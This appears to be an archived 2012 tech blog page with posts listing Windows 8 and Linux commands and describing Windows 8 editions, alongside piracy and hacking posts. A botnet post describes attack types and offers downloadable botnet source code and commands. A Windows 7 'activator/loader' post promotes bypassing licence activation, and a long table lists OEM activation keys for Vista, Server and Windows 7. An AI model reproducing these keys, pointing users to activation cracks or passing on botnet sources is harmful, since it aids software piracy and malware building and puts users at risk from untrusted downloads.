Wednesday, June 27, 2012

Windows 8 Command Line List and Reference



One of the bugs in the beta version seems to be that this entry for the command prompt sometimes gets greyed out. Another route to the command prompt is to place the mouse on the bottom-left corner of the screen and right-click the tile that pops up. The context menu contains an entry both for the regular command line and for the commannd line run as administrator.

Another way to the command prompt will be familiar. Use the keyboard shortcut Winkey+R to open the Run line and then enter "cmd" (without quotes).

Once the command shell is open, it looks pretty similar to previous versions

List of commands in Windows 8

ASSOC Displays or modifies file extension associations.
ATTRIB Displays or changes file attributes.
BREAK Sets or clears extended CTRL+C checking.
BCDBOOT Used to copy critical files to the system partition and to create a new system BCD store.
BCDEDIT Sets properties in boot database to control boot loading.
CACLS Displays or modifies access control lists (ACLs) of files.
CALL Calls one batch program from another.
CD Displays the name of or changes the current directory.
CHCP Displays or sets the active code page number.
CHDIR Displays the name of or changes the current directory.
CHKDSK Checks a disk and displays a status report.
CHKNTFS Displays or modifies the checking of disk at boot time.
CHOICE Batch file command that allows users to select from a set of options.
CIPHER Displays or alters the encryption of directories [files] on NTFS partitions.
CLIP Redirects output of another command to the Windows clipboard.
CLS Clears the screen.
CMD Starts a new instance of the Windows command interpreter.
CMDKEY Creates, lists and deletes stored user names and passwords or credentials.
COLOR Sets the default console foreground and background colors.
COMP Compares the contents of two files or sets of files byte-by-byte
COMPACT Displays or alters the compression of files on NTFS partitions.
CONVERT Converts FAT volumes to NTFS. You cannot convert the current drive.
COPY Copies one or more files to another location.
DATE Displays or sets the date.
DEFRAG Disk defragmenter accessory.
DEL Deletes one or more files.
DIR Displays a list of files and subdirectories in a directory.
DISKCOMP Compares the contents of two floppy disks.
DISKCOPY Copies the contents of one floppy disk to another.
DISKPART Displays or configures Disk Partition properties. A separte command interpreter with a sub-set of commands.
DOSKEY Edits command lines, recalls Windows commands, and creates macros.
DRIVERQUERY Displays current device driver status and properties.
ECHO Displays messages, or turns command echoing on or off.
ENDLOCAL Ends localization of environment changes in a batch file.
ERASE Deletes one or more files.
EXIT Quits and closes the command shell.
EXPAND Expands one or more compressed files.
FC Compares two files or sets of files, and displays the differences between them.
FIND Searches for a text string in a file or files.
FINDSTR Searches for strings in files.
FOR Runs a specified command for each item in a set.
FORFILES Selects files in a folder for batch processing.
FORMAT Formats a disk for use with Windows.
FSUTIL Displays or configures the file system properties.
FTYPE Displays or modifies file types used in file extension associations.
GOTO Directs the Windows command interpreter to a labeled line in a batch program.
GPRESULT Displays Group Policy information for machine or user.
GRAFTABL Enables Windows to display an extended character set in graphics mode.
HELP Provides Help information for Windows commands.
ICACLS Display, modify, backup, or restore ACLs for files and directories.
 IF Performs conditional processing in batch programs.
IPCONFIG Displays all current TCP/IP network configuration values
LABEL Creates, changes, or deletes the volume label of a disk.
MD Creates a directory.
MKDIR Creates a directory.
MKLINK Creates Symbolic Links and Hard Links
MODE Configures a system device.
MORE Displays output one screen at a time.
MOVE Moves one or more files from one directory to another directory.
OPENFILES Queries, displays, or disconnects open files or files opened by network users.
PATH Displays or sets a search path for executable files.
PAUSE Suspends processing of a batch file and displays a message.
POPD Restores the previous value of the current directory saved by PUSHD.
PRINT Prints a text file.
PROMPT Changes the Windows command prompt.
PUSHD Saves the current directory then changes it.
RD Removes a directory.
RECOVER Recovers readable information from a bad or defective disk.
REM Designates comments (remarks) in batch files
REN Renames a file or files.
RENAME Renames a file or files.
REPLACE Replaces files.
RMDIR Removes a directory.
ROBOCOPY Advanced utility to copy files and directory trees
SET Displays, sets, or removes environment variables for current session.
SETLOCAL Begins localization of environment changes in a batch file.
SETX Sets environment variables.
SC Displays or configures services (background processes).
SCHTASKS Schedules commands and programs to run on a computer.
SHIFT Shifts the position of replaceable parameters in batch files.
SHUTDOWN Allows proper local or remote shutdown of machine.
SORT Sorts input.
START Starts a separate window to run a specified program or command.
SUBST Associates a path with a drive letter.
SYSTEMINFO Displays machine specific properties and configuration.
TAKEOWN Allows an administrator to take ownership of a file.
TASKLIST Displays all currently running tasks including services.
TASKKILL Kill or stop a running process or application.
TIME Displays or sets the system time.
TIMEOUT Pauses the command processor for the specified number of seconds.
TITLE Sets the window title for a CMD.EXE session.
TREE Graphically displays the directory structure of a drive or path.
TYPE Displays the contents of a text file.
VER Displays the Windows version.
VERIFY Tells Windows whether to verify that your files are written correctly to a disk.
VOL Displays a disk volume label and serial number.
VSSADMIN Volume Shadow Copy Service administration tool
WHERE Displays the location of files that match a search pattern.
XCOPY Copies files and directory trees.
WMIC Displays WMI information inside interactive command shell. 
 
Share your Thoughts..

A to Z linux commands


Here are some linux commands for you so you can make your hands more and more dirty with ubuntu terminal.

mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem

mknod Make block or character special files
more Display output one screen at a time

mount Mount a file system

mtools Manipulate MS-DOS files

mtr Network diagnostics (traceroute/ping)

mv Move or rename files or directories

adduser Add a user to the system

addgroup Add a group to the system

alias Create an alias •

apropos Search Help manual pages (man -k)

apt-get Search for and install software packages (Debian/Ubuntu)

aptitude Search for and install software packages (Debian/Ubuntu)

aspell Spell Checker

awk Find and Replace text, database sort/validate/index
b
basename Strip directory and suffix from filenames
bash GNU Bourne-Again SHell
bc Arbitrary precision calculator language
bg Send to background
break Exit from a loop •

builtin Run a shell builtin

bzip2 Compress or decompress named file(s)
c
cal Display a calendar
case Conditionally perform a command

cat Display the contents of a file

cd Change Directory

cfdisk Partition table manipulator for Linux

chgrp Change group ownership

chmod Change access permissions

chown Change file owner and group

chroot Run a command with a different root directory

chkconfig System services (runlevel)

cksum Print CRC checksum and byte counts
clear Clear terminal screen

cmp Compare two files

comm Compare two sorted files line by line
command Run a command – ignoring shell functions •
continue Resume the next iteration of a loop •

cp Copy one or more files to another location

cron Daemon to execute scheduled commands

crontab Schedule a command to run at a later time

csplit Split a file into context-determined pieces

cut Divide a file into several parts
d
date Display or change the date & time

dc Desk Calculator

dd Convert and copy a file, write disk headers, boot records

ddrescue Data recovery tool
declare Declare variables and give them attributes •

df Display free disk space

diff Display the differences between two files

diff3 Show differences among three files

dig DNS lookup

dir Briefly list directory contents

dircolors Colour setup for `ls’

dirname Convert a full pathname to just a path

dirs Display list of remembered directories

dmesg Print kernel & driver messages

du Estimate file space usage
e
echo Display message on screen •

egrep Search file(s) for lines that match an extended expression

eject Eject removable media

enable Enable and disable builtin shell commands •

env Environment variables

ethtool Ethernet card settings

eval Evaluate several commands/arguments

exec Execute a command

exit Exit the shell
expect Automate arbitrary applications accessed over a terminal
expand Convert tabs to spaces
export Set an environment variable
expr Evaluate expressions
f
false Do nothing, unsuccessfully

fdformat Low-level format a floppy disk

fdisk Partition table manipulator for Linux

fg Send job to foreground

fgrep Search file(s) for lines that match a fixed string
file Determine file type
find Search for files that meet a desired criteria

fmt Reformat paragraph text
fold Wrap text to fit a specified width.
for Expand words , and execute commands
format Format disks or tapes
free Display memory usage

fsck File system consistency check and repair

ftp File Transfer Protocol
function Define Function Macros

fuser Identify/kill the process that is accessing a file


g
gawk Find and Replace text within file(s)
getopts Parse positional parameters
grep Search file(s) for lines that match a given pattern
groups Print group names a user is in
gzip Compress or decompress named file(s)
h
hash Remember the full pathnameof a name argument
head Output the first part of file(s)
help Display help for a built-in command •
history Command History
hostname Print or set system name
i
id Print user and group id’s
if Conditionally perform a command
ifconfig Configure a network interface
ifdown Stop a network interface
ifup Start a network interface up
import Capture an X server screen and save the image to file
install Copy files and set attributes
j
jobs List active jobs •
join Join lines on a common field
k
kill Stop a process from running
killall Kill processes by name
l
less Display output one screen at atime
let Perform arithmetic on shell variables •
ln Make links between files
local Create variables •
locate Find files
logname Print current login name
logout Exit a login shell •
look Display lines beginning with a given string
lpc Line printer control program
lpr Off line print
lprint Print a file
lprintd Abort a print job
lprintq List the print queue
lprm Remove jobs from the print queue
ls List information about file(s)
lsof List open files
m
make Recompile a group of programs
man Help manual
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mmv Mass Move and rename (files)
n
netstat Networking information
nice Set the priority of a commandor job
nl Number lines and write files
nohup Run a command immune to hangups
Notify-send Send desktop notifications
nslookup Query Internet name servers interactively
o
open Open a file in its default application
op Operator access
p
passwd Modify a user password
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
pkill Stop processes from running
popd Restore the previous value of the current directory
pr Prepare files for printing
printcap Printer capability database
printenv Print environment variables
printf Format and print data •
ps Process status
pushd Save and then change the current directory
pwd Print Working Directory
q
quota Display disk usage and limits
quotacheck Scan a file system for disk usage
quotactl Set disk quotas
r
ram ram disk device
rcp Copy files between two machines
read Read a line from standard input •
readarray Read from stdin into anarray variable •
readonly Mark variables/functions as readonly
reboot Reboot the system
rename Rename files
renice Alter priority of running processes
remsync Synchronize remote filesvia email
return Exit a shell function
rev Reverse lines of a file
rm Remove files
rmdir Remove folder(s)
rsync Remote file copy (Synchronize file trees)
s
screen Multiplex terminal, run remote shells via ssh
scp Secure copy (remote file copy)
sdiff Merge two files interactively
sed Stream Editor
select Accept keyboard input
seq Print numeric sequences
set Manipulate shell variables and functions
sftp Secure File Transfer Program
shift Shift positional parameters
shopt Shell Options
shutdown Shutdown or restart linux
sleep Delay for a specified time
slocate Find files
sort Sort text files
source Run commands from a file `.’
split Split a file into fixed-size pieces
ssh Secure Shell client (remote login program)
strace Trace system calls and signals
su Substitute user identity
sudo Execute a command as another user
sum Print a checksum for a file
suspend Suspend execution of this shell..
symlink Make a new name for a file

sync Synchronize data on disk with memory
t
tail Output the last part of files
tar Tape ARchiver
tee Redirect output to multiple files
test Evaluate a conditional expression
time Measure Program running time
times User and system times
touch Change file timestamps
top List processes running on the system
traceroute Trace Route to Host
trap Run a command when a signal is set(bourne)
tr Translate, squeeze, and/or delete characters
true Do nothing, successfully
tsort Topological sort
tty Print filename of terminal on stdin
type Describe a command •
u
ulimit Limit user resources •
umask Users file creation mask
umount Unmount a device
unalias Remove an alias •
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scaleto another
unset Remove variable or functionnames
unshar Unpack shell archive scripts
until Execute commands (until error)
useradd Create new user account
usermod Modify user account
users List users currently logged in
uuencode Encode a binary file
uudecode Decode a file created byuuencode
v
v Verbosely list directory contents (`ls -l -b’)
vdir Verbosely list directory contents (`ls -l -b’)
vi Text Editor
vmstat Report virtual memory statistics
w
watch Execute/display a program periodically
wc Print byte, word, and line counts
whereis Search the user’s $path, man pages and source files for a program
which Search the user’s $path for a program file
while Execute commands
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un’)
Wget Retrieve web pages or files via HTTP, HTTPS or FTP
write Send a message to another user
x
xargs Execute utility, passing constructed argument list(s)
xdg-open Open a file or URL in theuser’s preferred application.
yes Print a string until interrupted
. Run a command script in the current shell

Share your Comments here..

Saturday, June 23, 2012

Announcing the Windows 8 Editions



Windows 8 has the flexibility you need - whether you’re on an x86/64 or a WOA PC. You can use a touch screen or a keyboard and mouse – and switch anytime. It’s beautiful, fast, and fluid design is perfect for a wide range of hardware. And you’ll love browsing through the Windows Store and downloading all the apps you want. And those apps can work together too so you can share photos, maps, contacts, links and whatever else you want faster and easier. All editions of Windows 8 offer a no-compromise experience.

First, Windows 8 is the official product name for the next x86/64 editions of Windows.

For PCs and tablets powered by x86 processors (both 32 and 64 bit), we will have two editions: Windows 8 and Windows 8 Pro. For many consumers, Windows 8 will be the right choice. It will include all the features above plus an updated Windows Explorer, Task Manager, better multi-monitor support and the ability to switch languages on the fly, which was previously only available in Enterprise/Ultimate editions of Windows. For China and a small set of select emerging markets, we will offer a local language-only edition of Windows 8.

Windows 8 Pro is designed to help tech enthusiasts and business/technical professionals obtain a broader set of Windows 8 technologies. It includes all the features in Windows 8 plus features for encryption, virtualization, PC management and domain connectivity. Windows Media Center will be available as an economical “media pack” add-on to Windows 8 Pro. If you are an enthusiast or you want to use your PC in a business environment, you will want Windows 8 Pro.

Windows RT is the newest member of the Windows family – also known as Windows on ARM or WOA. This single edition will only be available pre-installed on PCs and tablets powered by ARM processors and will help enable new thin and lightweight form factors with impressive battery life. Windows RT will include touch-optimized desktop versions of the new Microsoft Word, Excel, PowerPoint, and OneNote. For new apps, the focus for Windows RT is development on the new Windows runtime, or WinRT, which we unveiled in September and forms the foundation of a new generation of cloud-enabled, touch-enabled, web-connected apps of all kinds.

The below chart breaks down key features by edition (this list should not be considered an exhaustive list of features):

Feature name Windows 8 Windows 8 Pro Windows RT
Upgrades from Windows 7 Starter, Home Basic, Home Premium
x
x

Upgrades from Windows 7 Professional, Ultimate
x
Start screen, Semantic Zoom, Live Tiles x x x
Windows Store x x x
Apps (Mail, Calendar, People, Messaging, Photos, SkyDrive, Reader, Music, Video) x x x
Microsoft Office (Word, Excel, PowerPoint, OneNote)

x
Internet Explorer 10 x x x
Device encryption

x
Connected standby x x x
Microsoft account x x x
Desktop x x x
Installation of x86/64 and desktop software x x
Updated Windows Explorer x x x
Windows Defender x x x
SmartScreen x x x
Windows Update x x x
Enhanced Task Manager x x x
Switch languages on the fly (Language Packs) x x x
Better multiple monitor support x x x
Storage Spaces x x
Windows Media Player x x
Exchange ActiveSync x x x
File history x x x
ISO / VHD mount x x x
Mobile broadband features x x x
Picture password x x x
Play To x x x
Remote Desktop (client) x x x
Reset and refresh your PC x x x
Snap x x x
Touch and Thumb keyboard x x x
Trusted boot x x x
VPN client x x x
BitLocker and BitLocker To Go
x
Boot from VHD
x
Client Hyper-V
x
Domain Join
x
Encrypting File System
x
Group Policy
x
Remote Desktop (host)
x

Windows RT - Does not Support Boot From VHD, Client Hyper - V, Domain Join, Encrypting File System, Group Policy, Remote Desktop(host), Windows Media player, Storage Space.

In the coming months, we plan to share much more information about Windows 8, including details on pricing and limited-time programs and promotions that we will make available to customers..

NOTE:  As with previous versions of Windows, we will also have an edition of Windows 8 specifically for those enterprise customers with Software Assurance agreements. Windows 8 Enterprise includes all the features of Windows 8 Pro plus features for IT organization that enable PC management and deployment, advanced security, virtualization, new mobility scenarios, and much more..

Join Our Blog To receive mail updates..

Dont be a silent user.., Share comments., your ideas to us..

Friday, June 22, 2012

Free Windows 8 Download


Windows 8 is the codename for the upcoming version of Microsoft Windows that follows, it is a bold shift from Windows 7 and represents Microsoft’s new direction. but now Windows 8 is under development, We don’t know when the windows 8 will be released, but we can experience the Windows 8 beta version, to feel and outlook the next-generation Microsoft Windows System:Windows 8, Here we will share the lastest Windows 8 download, you can downlaod it free:.

 Minimum system requirements-
1 GHz or faster 32-bit (x86) or 64-bit (x64) processor
16 GB available hard disk space (32-bit) or 20 GB (64-bit)
1 GB RAM (32-bit) or 2 GB RAM (64-bit)
DirectX 9 graphics device with WDDM 1.0 or higher driver
Taking advantage of touch input requires a screen that supports multi-touch
To run Metro style Apps, you need a screen resolution of 1024 X 768 or greater

The Latest Windows 8 Release Preview download: (May 31)

English:
32 bit:  http://go.microsoft.com/fwlink/?LinkId=251533
Sha1: 0xD76AD96773615E8C504F63564AF749469CFCCD57

64 bit: http://go.microsoft.com/fwlink/?LinkId=251532
Sha1: 0x8BED436F0959E7120A44BF7C29FF0AA962BDEFC9

If you need other language version of Windows Release Preview: check here

Product Key:
TK8TP-9JN6P-7X7WW-RFFTV-B7QPF

>>What do you Think about Windows 8?
>>Is Windows 8 killing Desktop? 
Share your Comments...

Thursday, June 21, 2012

Botnets Working Techniques And its Commands

A botnet is a collection of compromised computers, each of which is known as a 'bot', connected to the Internet. When a computer is compromised by an attacker, there is often code within the malware that commands it to become part of a botnet. The "botmaster" or "bot herder" controls these compromised computers via standards-based network protocols such as IRC and http

Types of attacks-

  • Denial-of-service attacks where multiple systems autonomously access a single Internet system or service in a way that appears legitimate, but much more frequently than normal use and cause the system to become busy.
  • Adware exists to advertise some commercial entity actively and without the user's permission or awareness, for example by replacing banner ads on web pages with those of another content provider.
  • Spyware is software which sends information to its creators about a user's activities – typically passwords, credit card numbers and other information that can be sold on the black market. Compromised machines that are located within a corporate network can be worth more to the bot herder, as they can often gain access to confidential information held within that company. There have been several targeted attacks on large corporations with the aim of stealing sensitive information, one such example being the Aurora botnet.
  • E-mail spam are e-mail messages disguised as messages from people, but are either advertising, annoying, or malicious in nature.
  • Click fraud is the user's computer visiting websites without the user's awareness to create false web traffic for the purpose of personal or commercial gain.
  • Access number replacements are where the botnet operator replaces the access numbers of a group of dial-up bots to that of a victim's phone number. Given enough bots taking part in this attack, the victim is constantly bombarded with phone calls attempting to connect to the internet. Having very little to defend against this attack, most are forced into changing their phone numbers (land line, cell phone, etc.).
  • Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies.
  • Brute-forcing remote machines services such as FTP, SMTP and SSH.
  • The worm behavior. Some botnet are designed to infect other hosts automatically.
  • Scareware can install the virus or the virus can install a scareware. For example users can be forced to buy a rogue anti-virus to regain access to their computer.
  • Exploiting systems by using multiple identities such as multiple player at the same poker table and voting system such as music clip and contest.
Download This Source Codes-
By Project HackersGrp
 

Download 2- Botnet Commands  

>>Leave a comment..

>>Join our blog For mail Updates...

Tuesday, June 19, 2012

Windows 7 Activator + Loader Download



Activate Your Windows 7 OS From trial to genuine Version using the Activator or Loader..

Download The Tool given below..

Click Here to Download

Share your comments...

Monday, June 18, 2012

Vista, Server & Windows 7 Activation keys


######################################################
OS  |  Type   |  Brand  |  Key
######################################################
Vista|Ultimate|Acer|3YDB8-YY3P4-G7FCW-GJMPG-VK48C
Vista|Ultimate|Advent|39MVW-K8KKQ-BGJ9B-24PMW-RYQMV
Vista|Ultimate|Alienware|7QVFM-MF2DT-WXJ62-XTYX3-P9YTT
Vista|Ultimate|Asus|6F2D7-2PCG6-YQQTB-FWK9V-932CC
Vista|Ultimate|Dell|2QBP3-289MF-9364X-37XGX-24W6P
Vista|Ultimate|DixonXP|6JPQR-4G364-2B7P7-83FXW-DR8QC
Vista|Ultimate|Gateway|6P8XK-GDDTB-X9PJQ-PYF36-G8WGV
Vista|Ultimate|Hedy|7R2C3-DWCBG-C8G96-MPT8T-K37C7
Vista|Ultimate|HP|23CM9-P7MYR-VFWRT-JGH7R-R933G
Vista|Ultimate|Lenovo|24J6Q-YJJBG-V4K4Q-2J8HY-8HBQQ
Vista|Ultimate|OQO|C4QGV-XHYYT-9PW8R-DCFTQ-FBD6M
Vista|Ultimate|Toshiba|33G3W-JY3XQ-CQQ7C-TG96R-R6J6Q
Vista|Ultimate|Sony|2KKTK-YGJKV-3WMRR-3MDQW-TJP47
Vista|Business|Acer|2TJTJ-C72D7-7BCYH-FV3HT-JGD4F
Vista|Business|Asus|72PFD-BCBK8-R7X4H-6F2XJ-VVMP9
Vista|Business|Dell|368Y7-49YMQ-VRCTY-3V3RH-WRMG7
Vista|Business|Fujitsu|4C3CM-H3RXM-VBMVQ-K8RHX-RTFX8
Vista|Business|Gateway|9GK24-BJJPV-93JB4-9CD3T-QTHDD
Vista|Business|HP|2Q2WM-VCB98-8C6BG-C9BT2-3XDRY
Vista|Business|Lenovo|2YRV9-YCY3F-FRJ4T-BKD6B-C47PP
Vista|Business|MSI|2X4F8-Y4QGK-Y8RTT-CK6PB-M8X92
Vista|Business|OQO|KBK7F-XCVK4-9W477-GPFVC-YXFDM
Vista|Business|Sony|3W2Y2-GRRYB-VH76X-KPDXX-XFJ4B
Vista|Business|Toshiba|38MK6-4QYC6-GJQQX-9DYQ4-H9MQD
Vista|BusinessN|Acer|2434H-HFRM7-BHGD4-W9TTD-RJVCH
Vista|HomeBasic|Acer|2W7FD-9DWCB-Q9CM8-KTDKK-8QXTR
Vista|HomeBasic|Asus|762HW-QD98X-TQVXJ-8RKRQ-RJC9V
Vista|HomeBasic|Benq|7R997-DXYDR-YGCR3-RHVDP-T8TKX
Vista|HomeBasic|CHS|2QM7G-GTFJ4-2DTTG-R73YR-W3D8G
Vista|HomeBasic|Dell|3YMR2-WMV49-4WD8X-M9WM7-CH4CG
Vista|HomeBasic|Fujitsu|4G8P7-TVW66-Y3H3V-C4Q4J-CQR2B
Vista|HomeBasic|Gateway|7Q3BC-897QP-6HVMF-TTJ34-P92J4
Vista|HomeBasic|Gericom|MDRBF-FKHJB-6J8RV-P4GKQ-G6BR8
Vista|HomeBasic|Gigabyte|889T3-F4VGX-QK4V7-JH76R-3HHRC
Vista|HomeBasic|HP|2VX48-BVXT6-GD2PK-BD3R2-44MV3
Vista|HomeBasic|Ksystem-Irbis|J2QKK-V8M3X-WRPPT-FBW4B-FQ6FP
Vista|HomeBasic|Lenovo|2WP98-KHTH2-KC7KG-4YR37-H8PHC
Vista|HomeBasic|LG|6DT3K-TCY4G-Y2VK9-T8J3T-2RGT7
Vista|HomeBasic|Mecer|C3MXB-T6PGC-2M2XV-C6PRX-TPW79
Vista|HomeBasic|Medion|3XFY9-7GTXV-93RXP-V62MQ-84WP6
Vista|HomeBasic|NEC|2432B-Q9RGP-VT9CK-64JFP-X6XVT
Vista|HomeBasic|Packard Bell|4GW2B-QCB6W-BWTVG-2DDKY-KRDMH
Vista|HomeBasic|Rover|BMHBK-PJD8J-WDWGY-Q4D6Q-46YJP
Vista|HomeBasic|Samsung|27WDG-2G9G2-BTVMF-W4KCX-9F8PX
Vista|HomeBasic|Sony|4DWY4-M6VH9-Y6FX6-D2H3V-3PXM9
Vista|HomeBasic|Toshiba|4DV48-MFJR8-VRW92-3VTYM-HBTPB
Vista|HomeBasic|Trigem|2YY8K-6KVM4-3DTT6-XRFHK-RYYDG
Vista|HomeBasicN|Acer|22TC9-RDMDD-VXMXD-2XM2Y-DT6FX
Vista|HomePremium|Acer|2TYBW-XKCQM-XY9X3-JDXYP-6CJ97
Vista|HomePremium|Alienware|D9CRD-R8YYQ-VYG3W-YG4FK-2CXRF
Vista|HomePremium|Asus|8XPM9-7F9HD-4JJQP-TP64Y-RPFFV
Vista|HomePremium|Dell|4GPTT-6RYC4-F4GJK-KG77H-B9HD2
Vista|HomePremium|DixonXP|7VJMY-XWBMV-T3PCK-3FRWY-KKMRQ
Vista|HomePremium|Everex|BH3M9-MQPD8-PTPDK-T6DWK-B2XFW
Vista|HomePremium|Founder|C6KM8-8JDBT-QBRM8-2MGFH-XH7QY
Vista|HomePremium|Fujitsu|6M66G-C2BGD-XGBBV-2BHKV-C9KM3
Vista|HomePremium|Gateway|6DX2X-QR7XB-3RBY2-BGQ2R-DR9M6
Vista|HomePremium|HP|HW7V9-XYT4W-PFR9Q-2DKGJ-RR4TD
Vista|HomePremium|iQon|6R99P-3HY62-7XR3F-WGP2T-HKCB9
Vista|HomePremium|Kohjinsha|HRCXG-RQPBQ-YBP92-KFFRY-JKQQ3
Vista|HomePremium|Ksystem-Irbis|7QVBM-X4KG7-QCWDP-YC8PQ-PXKH8
Vista|HomePremium|Lenovo|34BKK-QK76Y-WWR7C-QF2M7-2TB37
Vista|HomePremium|LG|73JC4-PR3R6-9DKYC-FDG3K-3FTT3
Vista|HomePremium|Medion|4FG94-MMYPT-H2QD2-V4DCP-X7QB8
Vista|HomePremium|MeshPC|HR3TD-CH9JD-CT8WF-X948R-C3QR3
Vista|HomePremium|MSI|86C2J-2M84W-HBMRQ-GBJWJ-VPTRM
Vista|HomePremium|NEC|22CTR-JFKJJ-BMXQK-XKXBC-C8R98
Vista|HomePremium|Optima|863XK-7RW2B-6R8CR-4FYQV-3FTW8
Vista|HomePremium|Packard Bell|6PFJK-WKXQR-9Q27C-6CWD7-MQ3CQ
Vista|HomePremium|Paradigit|6DX4V-3CJX6-97XGD-KW4C2-PVRRK
Vista|HomePremium|Powerspec|CK82T-QVTHF-8HGMF-9F3G9-FJH92
Vista|HomePremium|Quanmax|88XKM-J69QV-VB9M9-QCM66-647KW
Vista|HomePremium|Samsung|2MQH8-77KBM-PRTT7-HVDWW-DCXVT
Vista|HomePremium|Sony|6JWV3-843DD-4GV68-6D8JB-G6MF9
Vista|HomePremium|Targa|6VJ7B-3KTJH-H3DDQ-7JD7G-26VMG
Vista|HomePremium|TCL|BH626-XT3FK-MJKJH-6GQT2-QXQMF
Vista|HomePremium|Toshiba|6DG3Y-99KMR-JQMWD-2QJRJ-RJ34F
Vista|HomePremium|Velocity|GCHCQ-WTYXJ-GDJBC-JYDCX-F9VXW
Vista|Starter|Acer|26VQB-RP3T9-63FVV-VD7RF-H7M2Q
Vista|Starter|Lenovo|23Q4W-YQPHY-TY89Y-7Q3VX-W72KT
Server|ServerEnterprise|Dell|BKCJJ-J6G9Y-4P7YF-8D4J7-7TCWD
Server|ServerStandard|Dell|D7TCH-6P8JP-KRG4P-VJKYY-P9GFF
Server|ServerWinFoundation|Dell|VMYRB-8BRVQ-KXWFF-334J3-F2WHJ
Server|SBS|Dell|76GGM-4MQ6T-XCJH9-6R2XQ-PW2D2
Server|Business|Dell|76GGM-4MQ6T-XCJH9-6R2XQ-PW2D2
Server|Enterprise|Dell|26Y2H-YTJY6-CYD4F-DMB6V-KXFCQ
Server|Standard|Dell|223PV-8KCX6-F9KJX-3W2R7-BB2FH
7|Ultimate|Acer|FJGCP-4DFJD-GJY49-VJBQ7-HYRR2
7|Ultimate|Alienware|VQ3PY-VRX6D-CBG4J-8C6R2-TCVBD
7|Ultimate|Asus|2Y4WT-DHTBF-Q6MMK-KYK6X-VKM6G
7|Ultimate|Dell|342DG-6YJR8-X92GV-V7DCV-P4K27
7|Ultimate|HP|MHFPT-8C8M2-V9488-FGM44-2C9T3
#7|Ultimate|Lenovo 2|22TKD-F8XX6-YG69F-9M66D-PMJBM
7|Ultimate|Lenovo|6K2KY-BFH24-PJW6W-9GK29-TMPWP
7|Ultimate|Samsung|49PB6-6BJ6Y-KHGCQ-7DDY6-TF7CD
7|Ultimate|Sony|YJJYR-666KV-8T4YH-KM9TB-4PY2W
7|Professional|Acer|YKHFT-KW986-GK4PY-FDWYH-7TP9F
7|Professional|Asus|2WCJK-R8B4Y-CWRF2-TRJKB-PV9HW
7|Professional|Dell|32KD2-K9CTF-M3DJT-4J3WC-733WD
7|Professional|Fujitsu|PT9YK-BC2J9-WWYF9-R9DCR-QB9CK
7|Professional|HCL|2QTV2-3CMPP-FQBYK-GRD62-D7XMW
7|Professional|HP|74T2M-DKDBC-788W3-H689G-6P6GT
7|Professional|Lenovo|237XB-GDJ7B-MV8MH-98QJM-24367
7|Professional|Samsung|GMJQF-JC7VC-76HMH-M4RKY-V4HX6
7|Professional|Sony|H9M26-6BXJP-XXFCY-7BR4V-24X8J
7|Professional|Toshiba|2V8P2-QKJWM-4THM3-74PDB-4P2KH
7|Professional|Wortmann|6JKVQ-WJTWW-JVPRB-77TGD-2DV7M
#7|Professional|????|862R9-99CD6-DD6WM-GHDG2-Y8M37
#7|HomePremium|Asus 2|7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG
7|HomePremium|Acer|VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7
7|HomePremium|Advent|38JTJ-VBPFW-XFQDR-PJ794-8447M
7|HomePremium|Alienware|V3Y2W-CMF9W-PGT9C-777KD-32W74
7|HomePremium|Asus|2QDBX-9T8HR-2QWT6-HCQXJ-9YQTR
7|HomePremium|Dell|6RBBT-F8VPQ-QCPVQ-KHRB8-RMV82
7|HomePremium|Fujitsu|C6MHH-TRRPT-74TDC-FHRMV-XB88W
7|HomePremium|HCL|39QDH-D7MHH-WDMTD-TM2R9-KM7DB
7|HomePremium|HP|4FG99-BC3HD-73CQT-WMF7J-3Q6C9
7|HomePremium|Lenovo|27GBM-Y4QQC-JKHXW-D9W83-FJQKD
7|HomePremium|LG|38GRR-KMG3D-BTP99-TC9G4-BBDJJ
7|HomePremium|Medion|2P2P9-CM3F8-FTV6P-PC7CX-8TFF7
7|HomePremium|MSI|4G3GR-J6JDJ-D96PV-T9B9D-M8X2Q
7|HomePremium|Packard Bell|VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7
7|HomePremium|Samsung|CQBVJ-9J697-PWB9R-4K7W4-2BT4J
7|HomePremium|Siragon|HWDFB-YVFG4-3TJ7F-Q3WMT-7B6PH
7|HomePremium|Sony|H4JWX-WHKWT-VGV87-C7XPK-CGKHQ
7|HomePremium|Toshiba|6B88K-KCCWY-4F8HK-M4P73-W8DQG
#7|HomePremium|Toshiba 2|6GF36-P4HWR-BFF84-6GFC2-BWX77
#7|HomePremium|????|2P2P9-CM3F8-FTV6P-PC7CX-8TFF7
7|HomeBasic|Acer|MB4HF-2Q8V3-W88WR-K7287-2H4CP
7|HomeBasic|Asus|89G97-VYHYT-Y6G8H-PJXV6-77GQM
7|HomeBasic|Dell|36T88-RT7C6-R38TQ-RV8M9-WWTCY
7|HomeBasic|HP|DX8R9-BVCGB-PPKRR-8J7T4-TJHTH
7|HomeBasic|Lenovo|22MFQ-HDH7V-RBV79-QMVK9-PTMXQ
7|HomeBasic|Samsung|2P6PB-G7YVY-W46VJ-BXJ36-PGGTG
7|HomeBasic|Sony|YV7QQ-RCXQ9-KTBHC-YX3FG-FKRW8
7|HomeBasic|Tongfang|9DBMT-GXRWM-6Q9Y3-WMYM8-FJCBW
7|HomeBasic|Toshiba|9H4FH-VD69Y-TGBD2-4PM4K-DRMMH
7|Starter|Acer|RDJXR-3M32B-FJT32-QMPGB-GCFF6
7|Starter|Asus|6K6WB-X73TD-KG794-FJYHG-YCJVG
7|Starter|Casper ERA|6PB94-MC2C6-4F37H-KTJ32-PF2PT
7|Starter|Dell|36Q3Y-BBT84-MGJ3H-FT7VD-FG72J
7|Starter|HP|RH98C-M9PW4-6DHR7-X99PJ-3FGDB
7|Starter|Lenovo|273P4-GQ8V6-97YYM-9YTHF-DC2VP
7|Starter|MSI|2W4DJ-JFFJV-DMCPP-2C3X8-883DP
7|Starter|Nokia|2XGHP-9TQK2-8CF28-BM2P2-8FRX8
7|Starter|Sony|32J2V-TGQCY-9QJXP-Q3FVT-X8BQ7
